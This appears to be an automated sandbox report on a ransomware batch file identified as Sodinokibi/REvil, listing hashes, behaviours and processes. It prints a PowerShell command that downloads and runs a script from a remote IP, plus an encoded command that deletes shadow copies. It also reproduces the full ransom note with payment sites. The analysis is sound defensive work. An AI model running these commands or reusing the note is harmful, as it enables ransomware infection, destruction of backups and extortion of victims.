Overview

overview

10

Static

static

Muz2mJiJ.bat

windows7_x64

10

Muz2mJiJ.bat

windows10_x64

10

Analysis

  • max time kernel
    147s
  • max time network
    164s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    30-04-2020 18:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Muz2mJiJ.bat

  • Size

    189B

  • MD5

    bb4861fd9b1cd958fbdd63202aaf58a1

  • SHA1

    2646649376f6f3d50a9c2c07e1cad41e7100c17c

  • SHA256

    c3db21a3bdac87c8d424b99e8982e5ab86b8f648e7ec7c9268ea50621aa0c718

  • SHA512

    c6813ea6762f16b446d053073ada0da7417e0160f265c9ed8244d6fd233b7c5c122ca9a5662076fd7afdc5644e0bd6d059cf3542142a5c3ff228574f41d909a8

Score
10/10
evasionspywaretrojanransomwaresodinokibipersistence

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/Muz2mJiJ

Extracted

Path

C:\sm4at8zor-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. OSTEAD. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension sm4at8zor. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F69439FE956460C6 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/F69439FE956460C6 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: eEC/jy8ctC0qOI8fRKRujf//4moCs9RF2hn3w8EIELxT92JiJdu1t7e5jHQaAUEQ FDpSmWVLuGA7VqEQNqzSSSunt++vsVxpgMjZVqvDZ4tEZ8SAYWCK32cicTn4TfXr 5Nw1YI3evYf+E4UuAwdsn+GafooTUCGV4zGtww55eyHdhC7BhUc3V82xzbzweaLA TaaZEKy1yOUGwaLQTuueJv0jcrlW0aH4D45LBaeQEuEC7mdgly5ekqAoPT5nG41j vduZUNtaRDelI0vRKfaT/KwKOA9MpJolNhuCOwIy1kAtIKAM1G4i3QddWoRKlFnN JYIinOKmI74agQvztfiyFa4ct8b1Z8lJldke+VEdpGCUmkEG3O/BEAOzUUjJBc0v gBb5k72Y8IhxhuJe+yvP+8wd/Y3y6drl8fi4pcYW81SboGXnWdzklVs8DM4t5Mbu ElhnvuHjp06clsARvwhTiHNPr88LeJCEPi/uASbsNWnvjxMCmM1hsTMCwfwTNavt a09PiF/CqBO0HMIV0yRY0M7LTz5nUiskdPTLltjawbYLR8kvhk3ZqD2NTzjSVuK2 8YbMSy53AjeYLimOf+dQ+pvnF73feLQotuq+L46tzWhfCiaudGrWzFqribZ3G17Y sGMDIef/DYB/ZN9/XvfhI/VJPZ+QgaZ7BH2PZaNXjm64WSULpFgGiaOqckXcPCaI 4bAYG0QTur8esozCnLhefIrX4Dum9rlMrpx0tIAX+h0/d+g98waV02FKoU9ox5Zo H0F0OjbFA8KoAv/Ljfm96kfaJPlGYXlbdlEkSx9/IXqn667MhuJAF198Ql+TJip+ hHTFignIeQCpsl9kM/6WSaylkYGwfp3oejhINVhYpTmzkwRzA/Fa4ydtCFU+wBfx JCmYrZ520aYdoM6P1pBkyPPu7gbPuc1lG2DrnwKla6VMnIL/Ch0ttXqmtq+SQ1xg ldyk2gi9y2CfNv9VlwZ3nayj8fZQx60AX8WuywD7t8OHfX0UhTQIgR4BTryhOGTk xP6Sh5sJWViXn1oSA9sqoLxU7QEg5b7avRaDnCY0v8Vlz8fzoMyY7OH5J8j+iPxc mZxQ9TrcjLPsqZRnWDSYmmkGzca1QsyVR3tQtQOH0E0bDh2qJHMv20EKU7j8p3N8 7JBMVzljLaq3QjBsugxirrSkTpiNfrRH7qwkBu63J+zEs1smMjVUylFaNg4QJCdT GzAPpPO/JGCtv+f2JU+qjCv+/JvHERRSa0bjhXKkX2uzyNqJbz99L8kB054qpV08 27febau3wSwNqp0If1204EoPX9TqljVWTgWZyz4puXEpp8Qf1qI= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F69439FE956460C6

http://decryptor.cc/F69439FE956460C6

Signatures

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Makes http(s) request 35 IoCs

    Contacts server via http/https, possibly for C2 communication.

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Drops file in Program Files directory 26 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 107 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
    evasionspywaretrojan
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Muz2mJiJ.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1060
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Muz2mJiJ');Invoke-KFSFPL;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Drops file in System32 directory
      • Drops file in Program Files directory
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Modifies system certificate store
      • Sets desktop wallpaper using registry
      PID:364
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:268
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1620

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit